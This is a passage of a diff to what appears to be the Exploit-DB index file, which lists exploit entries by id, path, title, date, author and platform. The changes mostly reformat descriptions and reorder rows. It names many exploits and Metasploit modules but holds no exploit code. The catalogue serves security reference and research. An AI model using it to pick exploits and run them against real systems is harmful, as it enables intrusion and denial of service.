9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (2)",1997-11-20,"Konrad Malewski",multiple,remote,0 -20812,platforms/windows/remote/20812.c,"FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (3)",1997-11-20,m3lt,windows,remote,0 -20813,platforms/multiple/remote/20813.c,"FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (4)",1997-11-20,MondoMan,multiple,remote,0 -20814,platforms/windows/remote/20814.c,"FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (5)",1997-11-20,"Dejan Levaja",windows,remote,0 +20810,platforms/multiple/remote/20810.c,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 loopback (land.c) DoS (1)",1997-11-20,m3lt,multiple,remote,0 +20811,platforms/multiple/remote/20811.cpp,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 loopback (land.c) DoS (2)",1997-11-20,"Konrad Malewski",multiple,remote,0 +20812,platforms/windows/remote/20812.c,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 loopback (land.c) DoS (3)",1997-11-20,m3lt,windows,remote,0 +20813,platforms/multiple/remote/20813.c,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 loopback (land.c) DoS (4)",1997-11-20,MondoMan,multiple,remote,0 +20814,platforms/windows/remote/20814.c,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 loopback (land.c) DoS (5)",1997-11-20,"Dejan Levaja",windows,remote,0 20815,platforms/windows/remote/20815.pl,"Microsoft IIS 5.0 - (.printer) ISAPI Extension Buffer Overflow Vulnerability (1)",2001-05-01,storm,windows,remote,0 20816,platforms/windows/remote/20816.c,"Microsoft IIS 5.0 - (.printer) ISAPI Extension Buffer Overflow Vulnerability (2)",2001-05-01,"dark spyrit",windows,remote,0 20817,platforms/windows/remote/20817.c,"Microsoft IIS 5.0 - (.printer) ISAPI Extension Buffer Overflow Vulnerability (3)",2005-02-02,styx,windows,remote,0 @@ -18114,14 +18145,14 @@ id,file,description,date,author,platform,type,port 20840,platforms/windows/remote/20840.txt,"Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (6)",2001-05-15,A.Ramos,windows,remote,0 20841,platforms/windows/remote/20841.txt,"Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (7)",2001-05-15,"Gary O'Leary-Steele",windows,remote,0 20842,platforms/windows/remote/20842.txt,"Microsoft IIS 3.0/4.0/5.0 PWS Escaped Characters Decoding Command Execution (8)",2001-05-15,Roelof,windows,remote,0 -20843,platforms/linux/local/20843.txt,"Immunix OS 6.2/7.0,Redhat 5.2/6.2/7.0,S.u.S.E 6.x/7.0/7.1 Man -S Heap Overflow",2001-05-13,"zenith parsec",linux,local,0 +20843,platforms/linux/local/20843.txt,"Immunix OS 6.2/7.0_Redhat 5.2/6.2/7.0_S.u.S.E 6.x/7.0/7.1 Man -S Heap Overflow",2001-05-13,"zenith parsec",linux,local,0 20844,platforms/osx/dos/20844.txt,"Apple Personal Web Sharing 1.1/1.5/1.5.5 - Remote DoS Vulnerability",2001-05-10,"Jass Seljamaa",osx,dos,0 20845,platforms/osx/remote/20845.txt,"Maxum Rumpus FTP Server 1.3.2/1.3.4/2.0.3 dev Remote DoS",2001-05-15,"Jass Seljamaa",osx,remote,0 20846,platforms/windows/dos/20846.pl,"Microsoft IIS 4.0/5.0 FTP Denial of Service Vulnerability",2000-05-14,"Nelson Bunker",windows,dos,0 20847,platforms/hardware/dos/20847.c,"3Com OfficeConnect DSL Router 812 1.1.7/840 1.1.7 HTTP Port Router DoS",2001-09-21,Sniffer,hardware,dos,0 20848,platforms/php/webapps/20848.txt,"PHPSlash 0.5.3 2/0.6.1 URL Block Arbitrary File Disclosure Vulnerability",2001-04-15,"tobozo tagada",php,webapps,0 20849,platforms/cgi/remote/20849.pl,"DCForum 6.0 - Remote Admin Privilege Compromise Vulnerability",2001-05-08,"Franklin DeMatto",cgi,remote,0 -20850,platforms/windows/remote/20850.txt,"Pacific Software Carello 1.2.1 Shopping Cart Command Execution Vulnerability",2001-05-14,"Peter Gründl",windows,remote,0 +20850,platforms/windows/remote/20850.txt,"Pacific Software Carello 1.2.1 Shopping Cart Command Execution Vulnerability",2001-05-14,"Peter Gründl",windows,remote,0 20851,platforms/sco/local/20851.txt,"SCO OpenServer 5.0.x StartX Weak XHost Permissions Vulnerability",2001-05-07,"Richard Johnson",sco,local,0 20852,platforms/multiple/dos/20852.pl,"iPlanet 4.1 Web Publisher Remote Buffer Overflow Vulnerability (1)",2001-05-15,"Santi Claus",multiple,dos,0 20853,platforms/multiple/dos/20853.php,"iPlanet 4.1 Web Publisher Remote Buffer Overflow Vulnerability (2)",2001-05-15,"Gabriel Maggiotti",multiple,dos,0 @@ -18147,7 +18178,7 @@ id,file,description,date,author,platform,type,port 20876,platforms/windows/remote/20876.pl,"Simple Web Server 2.2-rc2 ASLR Bypass Exploit",2012-08-28,pole,windows,remote,0 20877,platforms/hardware/webapps/20877.txt,"Conceptronic Grab'n'Go and Sitecom Storage Center Password Disclosure",2012-08-28,"Mattijs van Ommeren",hardware,webapps,0 20878,platforms/cgi/remote/20878.txt,"mimanet source viewer 2.0 - Directory Traversal Vulnerability",2001-05-23,joetesta,cgi,remote,0 -20879,platforms/unix/remote/20879.txt,"OpenServer 5.0.5/5.0.6,HP-UX 10/11,Solaris 2.6/7.0/8 rpc.yppasswdd Buffer Overrun",2001-05-10,metaray,unix,remote,0 +20879,platforms/unix/remote/20879.txt,"OpenServer 5.0.5/5.0.6_HP-UX 10/11_Solaris 2.6/7.0/8 rpc.yppasswdd Buffer Overrun",2001-05-10,metaray,unix,remote,0 20880,platforms/windows/local/20880.c,"Microsoft Windows 2000 - Debug Registers Vulnerability",2001-05-24,"Georgi Guninski",windows,local,0 20881,platforms/multiple/remote/20881.txt,"Beck IPC GmbH IPC@CHIP TelnetD Login Account Brute Force Vulnerability",2001-05-24,"Courtesy Sentry Research Labs",multiple,remote,0 20882,platforms/multiple/remote/20882.txt,"faust informatics freestyle chat 4.1 sr2 - Directory Traversal Vulnerability",2001-05-25,nemesystm,multiple,remote,0 @@ -18187,6 +18218,7 @@ id,file,description,date,author,platform,type,port 20916,platforms/cgi/remote/20916.pl,"cgiCentral WebStore 400 - Arbitrary Command Execution Vulnerability",2001-05-06,"Igor Dobrovitski",cgi,remote,0 20917,platforms/windows/dos/20917.txt,"Winlog Lite SCADA HMI system SEH 0verwrite Vulnerability",2012-08-29,Ciph3r,windows,dos,0 20918,platforms/php/webapps/20918.txt,"Wordpress HD Webplayer 1.1 - SQL Injection Vulnerability",2012-08-29,JoinSe7en,php,webapps,0 +20955,platforms/windows/dos/20955.pl,"Internet Download Manager All Versions - Memory Corruption Vulnerability",2012-08-31,Dark-Puzzle,windows,dos,0 20922,platforms/osx/dos/20922.txt,"Rumpus FTP Server 1.3.x/2.0.3 - Stack Overflow DoS Vulnerability",2001-06-12,"Jass Seljamaa",osx,dos,0 20923,platforms/unix/local/20923.c,"LPRng 3.6.x Failure To Drop Supplementary Groups Vulnerability",2001-06-07,zen-parse,unix,local,0 20924,platforms/linux/remote/20924.txt,"MDBms 0.96/0.99 Query Display Buffer Overflow Vulnerability",2001-06-12,teleh0r,linux,remote,0 @@ -18208,7 +18240,6 @@ id,file,description,date,author,platform,type,port 20940,platforms/cgi/remote/20940.txt,"Tarantella Enterprise 3 3.x TTAWebTop.CGI Arbitrary File Viewing Vulnerability",2001-06-18,kf,cgi,remote,0 20941,platforms/freebsd/remote/20941.pl,"W3M 0.1/0.2 Malformed MIME Header Buffer Overflow Vulnerability",2001-06-19,White_E,freebsd,remote,0 20942,platforms/php/webapps/20942.html,"Booking System Pro CSRF Vulnerability",2012-08-30,DaOne,php,webapps,0 -20944,platforms/windows/remote/20944.rb,"SAP NetWeaver HostControl Command Injection",2012-08-31,metasploit,windows,remote,0 20945,platforms/solaris/local/20945.txt,"Sun SunVTS 4.x PTExec Buffer Overflow Vulnerability",2001-06-21,"Pablo Sor",solaris,local,0 20946,platforms/windows/dos/20946.txt,"Cerberus FTP Server 1.x - Buffer Overflow DoS Vulnerability",2001-06-21,"Cartel Informatique Security Research Labs",windows,dos,0 20947,platforms/windows/remote/20947.txt,"1C: Arcadia Internet Store 1.0 - Arbitrary File Disclosure Vulnerability",2001-06-21,ViperSV,windows,remote,0 @@ -18219,9 +18250,10 @@ id,file,description,date,author,platform,type,port 20952,platforms/linux/dos/20952.c,"eXtremail 1.x/2.1 - Remote Format String Vulnerability (1)",2001-06-21,"Luca Ercoli",linux,dos,0 20953,platforms/linux/remote/20953.c,"eXtremail 1.x/2.1 - Remote Format String Vulnerability (2)",2001-06-21,mu-b,linux,remote,0 20954,platforms/linux/remote/20954.pl,"eXtremail 1.x/2.1 - Remote Format String Vulnerability (3)",2006-10-06,mu-b,linux,remote,0 -20955,platforms/windows/dos/20955.pl,"Internet Download Manager All Versions - Memory Corruption Vulnerability",2012-08-31,Dark-Puzzle,windows,dos,0 20956,platforms/php/webapps/20956.txt,"vBulletin Yet Another Awards System 4.0.2 - SQL Injection",2012-08-31,Backsl@sh/Dan,php,webapps,0 20957,platforms/windows/dos/20957.pl,"WarFTP Daemon 1.82 RC 11 - Remote Format String Vulnerability",2012-08-31,coolkaveh,windows,dos,0 +21017,platforms/linux/remote/21017.txt,"Squid Web Proxy 2.3 Reverse Proxy Vulnerability",2001-07-18,"Paul Nasrat",linux,remote,0 +21018,platforms/unix/remote/21018.c,"Solaris 2.x/7.0/8_IRIX 6.5.x_OpenBSD 2.x_NetBSD 1.x_Debian 3_HP-UX 10 Telnetd Buffer Overflow",2001-07-18,Dvorak,unix,remote,0 20959,platforms/windows/webapps/20959.py,"OTRS Open Technology Real Services 3.1.8 and 3.1.9 - XSS Vulnerability",2012-08-31,"Mike Eduard",windows,webapps,0 20960,platforms/unix/local/20960.c,"Juergen Schoenwaelder scotty 2.1.x ntping Buffer Overflow Vulnerability",2001-06-13,"Larry W. Cashdollar",unix,local,0 20961,platforms/unix/local/20961.sh,"KDE KTVision 0.1 File Overwrite Vulnerability",2001-06-21,IhaQueR,unix,local,0 @@ -18260,7 +18292,7 @@ id,file,description,date,author,platform,type,port 20994,platforms/linux/remote/20994.txt,"Cobalt Raq3 PopRelayD Arbitrary SMTP Relay Vulnerability",2001-07-04,"Andrea Barisani",linux,remote,0 20995,platforms/php/webapps/20995.txt,"cobalt qube webmail 1.0 - Directory Traversal Vulnerability",2001-07-05,kf,php,webapps,0 20996,platforms/php/webapps/20996.txt,"Basilix Webmail 1.0 File Disclosure Vulnerability",2001-07-06,"karol _",php,webapps,0 -20997,platforms/multiple/dos/20997.c,"HP-UX 11,Linux kernel 2.4,Windows 2000/NT 4.0,IRIX 6.5 Small TCP MSS DoS",2001-07-07,"Darren Reed",multiple,dos,0 +20997,platforms/multiple/dos/20997.c,"HP-UX 11_Linux kernel 2.4_Windows 2000/NT 4.0_IRIX 6.5 Small TCP MSS DoS",2001-07-07,"Darren Reed",multiple,dos,0 20998,platforms/linux/remote/20998.c,"xloadimage 4.1 - Buffer Overflow Vulnerability",2001-07-10,"zenith parsec",linux,remote,0 20999,platforms/hardware/local/20999.c,"Samsung ml85p Printer Driver 1.0 Insecure Temporary File Creation Vulnerability (1)",2001-07-10,"Charles Stevenson",hardware,local,0 21000,platforms/hardware/local/21000.sh,"Samsung ml85p Printer Driver 1.0 Insecure Temporary File Creation Vulnerability (2)",2001-07-10,ml85p,hardware,local,0 @@ -18270,7 +18302,7 @@ id,file,description,date,author,platform,type,port 21004,platforms/windows/remote/21004.txt,"Microsoft Outlook 98/2000/2002 - Arbitrary Code Execution Vulnerability",2001-07-12,"Georgi Guninski",windows,remote,0 21005,platforms/php/webapps/21005.txt,"admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",php,webapps,0 21006,platforms/windows/dos/21006.txt,"MAILsweeper - SMTP 4.2.1 + F-Secure Anti-Virus 5.0.2 & 5.2.1 - File Scanner Malicious Archive DoS",2001-07-12,"Michel Arboi",windows,dos,0 -21007,platforms/php/webapps/21007.txt,"AV Arcade Free Edition (add_rating.php, id parameter) Blind SQL Injection",2012-09-02,DaOne,php,webapps,0 +21007,platforms/php/webapps/21007.txt,"AV Arcade Free Edition - (add_rating.php id parameter) Blind SQL Injection",2012-09-02,DaOne,php,webapps,0 21008,platforms/cgi/remote/21008.txt,"interactive story 1.3 - Directory Traversal Vulnerability",2001-07-15,qDefense,cgi,remote,0 21009,platforms/windows/remote/21009.c,"ArGoSoft FTP Server 1.2.2.2 - Weak Password Encryption Vulnerability",2001-07-12,byterage,windows,remote,0 21010,platforms/linux/local/21010.sh,"XFree86 X11R6 3.3.2 XMan ManPath Environment Variable Buffer Overflow",2001-06-11,kf,linux,local,0 @@ -18279,10 +18311,8 @@ id,file,description,date,author,platform,type,port 21014,platforms/linux/local/21014.c,"Slackware 7.0/7.1/8.0 - Manual Page Cache File Creation Vulnerability",2001-07-17,josh,linux,local,0 21015,platforms/hardware/remote/21015.pl,"Check Point Firewall-1 4 SecureRemote Network Information Leak Vulnerability",2001-07-17,"Haroon Meer & Roelof Temmingh",hardware,remote,0 21016,platforms/windows/remote/21016.c,"ID Software Quake 3 - ""smurf attack"" Denial of Service Vulnerability",2001-07-17,"Andy Gavin",windows,remote,0 -21017,platforms/linux/remote/21017.txt,"Squid Web Proxy 2.3 Reverse Proxy Vulnerability",2001-07-18,"Paul Nasrat",linux,remote,0 -21018,platforms/unix/remote/21018.c,"Solaris 2.x/7.0/8,IRIX 6.5.x,OpenBSD 2.x,NetBSD 1.x,Debian 3,HP-UX 10 Telnetd Buffer Overflow",2001-07-18,Dvorak,unix,remote,0 21019,platforms/linux/remote/21019.txt,"Horde 1.2.x/2.1.3 and Imp 2.2.x/3.1.2 File Disclosure Vulnerability",2001-07-13,"Caldera Open Linux",linux,remote,0 -21020,platforms/multiple/local/21020.c,"NetWin DMail 2.x,SurgeFTP 1.0/2.0 Weak Password Encryption Vulnerability",2001-07-20,byterage,multiple,local,0 +21020,platforms/multiple/local/21020.c,"NetWin DMail 2.x_SurgeFTP 1.0/2.0 Weak Password Encryption Vulnerability",2001-07-20,byterage,multiple,local,0 21021,platforms/unix/remote/21021.pl,"SSH2 3.0 Short Password Login Vulnerability",2001-07-21,hypoclear,unix,remote,0 21022,platforms/php/webapps/21022.txt,"PHPLib Team PHPLIB 7.2 - Remote Script Execution Vulnerability",2001-07-21,"giancarlo pinerolo",php,webapps,0 21023,platforms/cgi/remote/21023.c,"CGIWrap 2.x/3.x - Cross-Site Scripting Vulnerability",2001-07-22,"TAKAGI Hiromitsu",cgi,remote,0 @@ -18291,7 +18321,7 @@ id,file,description,date,author,platform,type,port 21026,platforms/multiple/remote/21026.txt,"Sambar Server 4.4/5.0 pagecount File Overwrite Vulnerability",2001-07-22,kyprizel,multiple,remote,0 21027,platforms/multiple/remote/21027.txt,"Sambar Server 4.x/5.0 Insecure Default Password Protection Vulnerability",2001-07-25,3APA3A,multiple,remote,0 21028,platforms/hardware/dos/21028.pl,"Cisco IOS 12 UDP Denial of Service Vulnerability",2001-07-25,blackangels,hardware,dos,0 -21029,platforms/multiple/remote/21029.pl,"Softek MailMarshal 4,Trend Micro ScanMail 1.0 SMTP Attachment Protection Bypass",2001-07-25,"Aidan O'Kelly",multiple,remote,0 +21029,platforms/multiple/remote/21029.pl,"Softek MailMarshal 4_Trend Micro ScanMail 1.0 SMTP Attachment Protection Bypass",2001-07-25,"Aidan O'Kelly",multiple,remote,0 21030,platforms/windows/remote/21030.txt,"Snapstream Personal Video Station 1.2 a PVS Directory Traversal Vulnerability",2001-07-26,john@interrorem.com,windows,remote,0 21032,platforms/hardware/webapps/21032.txt,"Conceptronic Grab'n'Go Network Storage Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0 21033,platforms/hardware/webapps/21033.txt,"Sitecom Home Storage Center Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0 @@ -18302,17 +18332,17 @@ id,file,description,date,author,platform,type,port 21038,platforms/php/webapps/21038.txt,"PHP Nuke 5.0 - 'user.php' Form Element Substitution Vulnerabilty",2001-07-27,dinopio,php,webapps,0 21039,platforms/windows/remote/21039.pl,"SimpleServer:WWW 1.0.7/1.0.8/1.13 Hex Encoded URL Directory Traversal Vulnerability",2001-07-26,THRAN,windows,remote,0 21040,platforms/windows/remote/21040.txt,"Windows 98 ARP Denial of Service Vulnerability",2001-07-30,"Paul Starzetz",windows,remote,0 -21041,platforms/multiple/dos/21041.txt,"Microsoft Internet Explorer 3/4/5,Netscape Communicator 4 IMG Tag DoS Vulnerability",2001-06-19,"John Percival",multiple,dos,0 21042,platforms/multiple/dos/21042.txt,"id Software Quake 3 Arena Server 1.29 Possible Buffer Overflow Vulnerability",2001-07-29,Coolest,multiple,dos,0 21043,platforms/linux/local/21043.c,"GNU findutils 4.0/4.1 Locate Arbitrary Command Execution Vulnerability",2001-08-01,"Josh Smith",linux,local,0 -21044,platforms/windows/local/21044.c,"Oracle 8/9i DBSNMP Oracle Home Environment Variable Buffer Overflow",2001-08-02,"Juan Manuel Pascual Escribá",windows,local,0 -21045,platforms/unix/local/21045.c,"Oracle OTRCREP Oracle 8/9 Home Environment Variable Buffer Overflow Vulnerability",2001-08-02,"Juan Manuel Pascual Escribá",unix,local,0 +21044,platforms/windows/local/21044.c,"Oracle 8/9i DBSNMP Oracle Home Environment Variable Buffer Overflow",2001-08-02,"Juan Manuel Pascual Escribá",windows,local,0 +21045,platforms/unix/local/21045.c,"Oracle OTRCREP Oracle 8/9 Home Environment Variable Buffer Overflow Vulnerability",2001-08-02,"Juan Manuel Pascual Escribá",unix,local,0 21046,platforms/php/webapps/21046.txt,"phpBB 1.4 - Remote SQL Query Manipulation Vulnerability",2001-08-03,kill-9,php,webapps,0 21047,platforms/windows/dos/21047.txt,"Microsoft Windows NT 4.0 NT4ALL DoS Vulnerability",2001-08-03,hypoclear,windows,dos,0 21048,platforms/cgi/dos/21048.txt,"John O'Fallon Responder.cgi 1.0 DoS Vulnerability",1999-04-09,Epic,cgi,dos,0 21049,platforms/linux/remote/21049.c,"NCSA httpd 1.x - Buffer Overflow Vulnerability (1)",1997-04-23,savage,linux,remote,0 21050,platforms/linux/remote/21050.c,"NCSA httpd 1.x - Buffer Overflow Vulnerability (2)",1995-02-17,Xtremist,linux,remote,0 -21052,platforms/jsp/webapps/21052.txt,"jira 4.4.3, greenhopper < 5.9.8 - Multiple Vulnerabilities",2012-09-04,"Hoyt LLC Research",jsp,webapps,0 +21833,platforms/php/webapps/21833.rb,"PhpTax pfilez Parameter Exec Remote Code Injection",2012-10-10,metasploit,php,webapps,0 +21052,platforms/jsp/webapps/21052.txt,"jira 4.4.3_ greenhopper < 5.9.8 - Multiple Vulnerabilities",2012-09-04,"Hoyt LLC Research",jsp,webapps,0 21053,platforms/multiple/webapps/21053.txt,"Splunk <= 4.3.3 - Arbitrary File Read",2012-09-04,"Marcio Almeida",multiple,webapps,0 21054,platforms/php/webapps/21054.txt,"Support4Arabs Pages 2.0 - SQL Injection Vulnerability",2012-09-04,L0n3ly-H34rT,php,webapps,0 21056,platforms/php/webapps/21056.txt,"Group Office Calendar (calendar/json.php) SQL Injection",2012-09-04,"Chris Cooper",php,webapps,0 @@ -18344,6 +18374,7 @@ id,file,description,date,author,platform,type,port 21082,platforms/multiple/webapps/21082.txt,"novell sentinel log manager <= 1.2.0.1 - Directory Traversal",2011-12-18,"Andrea Fabrizi",multiple,webapps,0 21084,platforms/php/webapps/21084.txt,"ES Job Search Engine 3.0 - SQL Injection Vulnerability",2012-09-05,Vulnerability-Lab,php,webapps,0 21085,platforms/asp/webapps/21085.txt,"Ektron CMS 8.5.0 - Multiple Vulnerabilities",2012-09-05,"Sense of Security",asp,webapps,0 +21256,platforms/windows/local/21256.rb,"Winamp MAKI Buffer Overflow",2012-09-12,metasploit,windows,local,0 21088,platforms/unix/remote/21088.pl,"AOLServer 3 Long Authentication String Buffer Overflow Vulnerability (1)",2001-08-22,"Nate Haggard",unix,remote,0 21089,platforms/unix/remote/21089.c,"AOLServer 3 Long Authentication String Buffer Overflow Vulnerability (2)",2001-09-05,qitest1,unix,remote,0 21090,platforms/windows/local/21090.txt,"CuteFTP 4.2 Default Weak Password Encoding Vulnerability",2001-08-23,"E. van Elk",windows,local,0 @@ -18356,7 +18387,7 @@ id,file,description,date,author,platform,type,port 21097,platforms/solaris/remote/21097.txt,"Solaris 2.x/7.0/8 lpd Remote Command Execution Vulnerability",2001-08-31,ron1n,solaris,remote,0 21098,platforms/hp-ux/local/21098.c,"HP-UX 11.0 SWVerify Buffer Overflow Vulnerability",2001-09-03,foo,hp-ux,local,0 21099,platforms/windows/dos/21099.c,"Microsoft Windows 2000 RunAs Service Denial of Services Vulnerability",2001-12-11,Camisade,windows,dos,0 -21100,platforms/multiple/remote/21100.pl,"Cisco Secure IDS 2.0/3.0,Snort 1.x,ISS RealSecure 5/6,NFR 5.0 Encoded IIS Attack Detection Evasion",2001-09-05,blackangels,multiple,remote,0 +21100,platforms/multiple/remote/21100.pl,"Cisco Secure IDS 2.0/3.0_Snort 1.x_ISS RealSecure 5/6_NFR 5.0 Encoded IIS Attack Detection Evasion",2001-09-05,blackangels,multiple,remote,0 21101,platforms/unix/local/21101.sh,"Merit AAA RADIUS Server 3.8 rlmadmin Symbolic Link Vulnerability",2001-09-07,"Digital Shadow",unix,local,0 21102,platforms/cgi/remote/21102.txt,"Power Up HTML 0.8033 beta - Directory Traversal Arbitrary File Disclosure Vulnerability",2001-09-07,"Steve Shepherd",cgi,remote,0 21103,platforms/hardware/dos/21103.c,"D-Link Dl-704 2.56 b5 IP Fragment Denial of Service Vulnerability",2000-05-23,phonix,hardware,dos,0 @@ -18395,19 +18426,19 @@ id,file,description,date,author,platform,type,port 21137,platforms/multiple/remote/21137.rb,"HP SiteScope Remote Code Execution",2012-09-08,metasploit,multiple,remote,0 21138,platforms/php/remote/21138.rb,"Sflog! CMS 1.0 - Arbitrary File Upload Vulnerability",2012-09-08,metasploit,php,remote,0 21139,platforms/windows/local/21139.rb,"ActiveFax (ActFax) 4.3 Client Importer Buffer Overflow",2012-09-08,metasploit,windows,local,0 +21147,platforms/windows/dos/21147.txt,"WAP Proof 2008 - Denial of Service",2012-09-08,"Orion Einfold",windows,dos,0 +21148,platforms/php/webapps/21148.txt,"Pinterest Clone Script Multiple Vulnerabilities",2012-09-08,DaOne,php,webapps,0 21141,platforms/linux/dos/21141.txt,"Red Hat TUX 2.1.0-2 - HTTP Server Oversized Host Denial of Service Vulnerability",2001-11-05,"Aiden ORawe",linux,dos,0 21142,platforms/windows/remote/21142.pl,"Ipswitch WS_FTP Server 1.0.x/2.0.x - 'STAT' Buffer Overflow Vulnerability",2001-11-05,andreas,windows,remote,0 21143,platforms/windows/dos/21143.pl,"Raptor Firewall 4.0/5.0/6.0.x Zero Length UDP Packet Resource Consumption Vulnerability",2001-06-21,"Max Moser",windows,dos,0 21144,platforms/windows/remote/21144.txt,"Microsoft Internet Explorer 5/6 Cookie Disclosure/Modification Vulnerability",2001-11-09,"Jouko Pynnonen",windows,remote,0 21145,platforms/multiple/remote/21145.nasl,"IBM HTTP Server 1.3.x Source Code Disclosure Vulnerability",2001-11-08,"Felix Huber",multiple,remote,0 -21147,platforms/windows/dos/21147.txt,"WAP Proof 2008 - Denial of Service",2012-09-08,"Orion Einfold",windows,dos,0 -21148,platforms/php/webapps/21148.txt,"Pinterest Clone Script Multiple Vulnerabilities",2012-09-08,DaOne,php,webapps,0 21150,platforms/unix/local/21150.c,"Rational ClearCase 3.2/4.x DB Loader TERM Environment Variable Buffer Overflow Vulnerability",2001-11-09,virtualcat,unix,local,0 21151,platforms/linux/remote/21151.txt,"Horde IMP 2.2.x Session Hijacking Vulnerability",2001-11-09,"Joao Pedro Goncalves",linux,remote,0 21152,platforms/linux/remote/21152.c,"ActivePerl 5.6.1 perlIIS.dll Buffer Overflow Vulnerability (1)",2001-11-15,Indigo,linux,remote,0 21153,platforms/windows/remote/21153.c,"ActivePerl 5.6.1 perlIIS.dll Buffer Overflow Vulnerability (2)",2001-11-15,Indigo,windows,remote,0 21154,platforms/multiple/remote/21154.pl,"ActivePerl 5.6.1 perlIIS.dll Buffer Overflow Vulnerability (3)",2001-11-15,Sapient2003,multiple,remote,0 -21155,platforms/php/remote/21155.txt,"Network Tool 0.2 PHPNuke Addon Metacharacter Filtering Command Execution Vulnerability",2001-11-16,"Cabezon Aurélien",php,remote,0 +21155,platforms/php/remote/21155.txt,"Network Tool 0.2 PHPNuke Addon Metacharacter Filtering Command Execution Vulnerability",2001-11-16,"Cabezon Aurélien",php,remote,0 21156,platforms/windows/remote/21156.txt,"Opera 5.0/5.1 Same Origin Policy Circumvention Vulnerability",2001-11-15,"Georgi Guninski",windows,remote,0 21157,platforms/php/webapps/21157.txt,"bharat mediratta gallery 1.1/1.2 - Directory Traversal Vulnerability",2001-11-19,"Cabezon Aurelien",php,webapps,0 21158,platforms/linux/local/21158.c,"S.u.S.E 6.4/7.0/7.1/7.2 Berkeley Parallel Make Shell Definition Format String Vulnerability",2001-11-21,IhaQueR@IRCnet,linux,local,0 @@ -18417,8 +18448,8 @@ id,file,description,date,author,platform,type,port 21162,platforms/windows/dos/21162.pl,"Cooolsoft PowerFTP Server 2.0 3/2.10 - Multiple Denial of Service Vulnerability (1)",2001-11-29,"Alex Hernandez",windows,dos,0 21163,platforms/windows/dos/21163.pl,"Cooolsoft PowerFTP Server 2.0 3/2.10 - Multiple Denial of Service Vulnerability (2)",2001-11-29,"Alex Hernandez",windows,dos,0 21164,platforms/windows/remote/21164.txt,"Microsoft Internet Explorer 5.5/6.0 Spoofable File Extensions Vulnerability",2001-11-26,StatiC,windows,remote,0 -21165,platforms/php/webapps/21165.txt,"PHPNuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x user.php uname Parameter XSS Vulnerability",2001-12-03,"Cabezon Aurélien",php,webapps,0 -21166,platforms/php/webapps/21166.txt,"PHPNuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x modules.php Multiple Parameter XSS Vulnerability",2001-12-03,"Cabezon Aurélien",php,webapps,0 +21165,platforms/php/webapps/21165.txt,"PHPNuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x user.php uname Parameter XSS Vulnerability",2001-12-03,"Cabezon Aurélien",php,webapps,0 +21166,platforms/php/webapps/21166.txt,"PHPNuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x modules.php Multiple Parameter XSS Vulnerability",2001-12-03,"Cabezon Aurélien",php,webapps,0 21167,platforms/openbsd/local/21167.c,"OpenBSD 2.x/3.0 User Mode Return Value Denial of Service Vulnerability",2001-12-03,"Marco Peereboom",openbsd,local,0 21168,platforms/php/webapps/21168.txt,"EasyNews 1.5 NewsDatabase/Template Modification Vulnerability",2001-12-01,"markus arndt",php,webapps,0 21169,platforms/windows/remote/21169.txt,"ZoneAlarm Pro 1.0/2.x Outbound Packet Bypass Vulnerability",2001-12-06,"Tom Liston",windows,remote,0 @@ -18433,7 +18464,7 @@ id,file,description,date,author,platform,type,port 21178,platforms/windows/remote/21178.html,"Brian Dorricott MAILTO 1.0.7-9 Unauthorized Mail Server Use Vulnerability",2001-12-11,http-equiv,windows,remote,0 21179,platforms/solaris/remote/21179.pl,"Solaris 2.x/7.0/8 Derived 'login' Buffer Overflow Vulnerability",2003-01-09,snooq,solaris,remote,0 21180,platforms/solaris/remote/21180.c,"Solaris/SPARC 2.5.1/2.6/7/8 Derived 'login' Buffer Overflow Vulnerability",2004-12-04,"Marco Ivaldi",solaris,remote,0 -21181,platforms/multiple/dos/21181.txt,"Microsoft Internet Explorer 6.0,Mozilla 0.9.6,Opera 5.1 Image Count Denial of Service Vulnerability",2001-12-11,"Pavel Titov",multiple,dos,0 +21181,platforms/multiple/dos/21181.txt,"Microsoft Internet Explorer 6.0_Mozilla 0.9.6_Opera 5.1 Image Count Denial of Service Vulnerability",2001-12-11,"Pavel Titov",multiple,dos,0 21182,platforms/novell/remote/21182.txt,"Novell Groupwise 5.5/6.0 Servlet Gateway Default Authentication Vulnerability",2001-12-15,"Adam Gray",novell,remote,0 21183,platforms/cgi/remote/21183.txt,"webmin 0.91 - Directory Traversal Vulnerability",2001-12-17,"A. Ramos",cgi,remote,0 21184,platforms/cgi/webapps/21184.txt,"Agora.CGI 3.x/4.0 Debug Mode Cross-Site Scripting Vulnerability",2001-12-17,"Tamer Sahin",cgi,webapps,0 @@ -18452,6 +18483,7 @@ id,file,description,date,author,platform,type,port 21197,platforms/multiple/remote/21197.txt,"BSCW 3.4/4.0 Insecure Default Installation Vulnerability",2002-01-03,"Thomas Seliger",multiple,remote,0 21198,platforms/windows/remote/21198.html,"Microsoft Internet Explorer 5 JavaScript Local File Enumeration Vulnerability (1)",2002-01-03,"Tom Micklovitch",windows,remote,0 21199,platforms/windows/remote/21199.txt,"Microsoft Internet Explorer 5 JavaScript Local File Enumeration Vulnerability (2)",2002-01-03,"Liu Die",windows,remote,0 +21521,platforms/php/webapps/21521.txt,"ViArt Shop Enterprise 